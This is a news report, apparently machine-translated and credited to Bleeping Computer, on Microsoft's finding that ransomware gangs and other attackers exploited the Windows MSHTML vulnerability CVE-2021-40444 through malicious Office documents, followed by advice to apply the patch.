Η Microsoft says that many attackers, including ransomware gangs, use the RCE Windows MSHTML vulnerability, which was recently corrected by the company.
Exploitation of this vulnerability (CVE-2021-40444) began on August 18, about two weeks before Microsoft released a security advisory to address the issue.
According to telemetry data analyzed by security researchers Microsoft 365 Defender Threat Intelligence Team and Microsoft Threat Intelligence Center (MSTIC), the small number of initial attacks (less than 10) used malicious Office documents.
These attacks used error CVE-2021-40444 “as part of an initial access campaign distributing custom Cobalt Strike Beacon loaders".
The Beacons, developed on the network of at least one victim, communicated with malicious infrastructure linked to many criminal campaigns, including ransomware groups.
Some of the Cobalt Strike infrastructure used in the August attacks has also been used in the past to distribute BazaLoader and Trickbot payloads.
Ransomware gangs exploit Windows MSHTML vulnerability after public disclosure
Microsoft noticed huge increase in vulnerability efforts within 24 hours of CVE-2021-40444 advisory publication.
"Following the revelation, Microsoft noticed several threat carriers, including ransomware-as-a-service affiliates, adopting proof-of-concept code in their toolkits" the researchers added.
Microsoft continues to monitor the situation and work to protect users.
MSTIC Threat Intelligence analyst, Justin Warner, said other hacking teams will add CVE-2021-40444 exploits to their arsenal in the coming days and weeks.
Microsoft recommends immediate implementation of Patch Tuesday released on Tuesday, to fix the Windows MSHTML vulnerability and prevent attacks.
CVE-2021-40444 error affects the systems they are running Windows Server 2008 to 2019 and Windows 8.1 or later. In terms of severity, it has been rated 8.1 / 10.
Security updates released by Microsoft address vulnerabilities in all affected versions of Windows.
If someone can not update their system, they can apply security measures proposed by Microsoft to partially address the issue.
Source: Bleeping Computer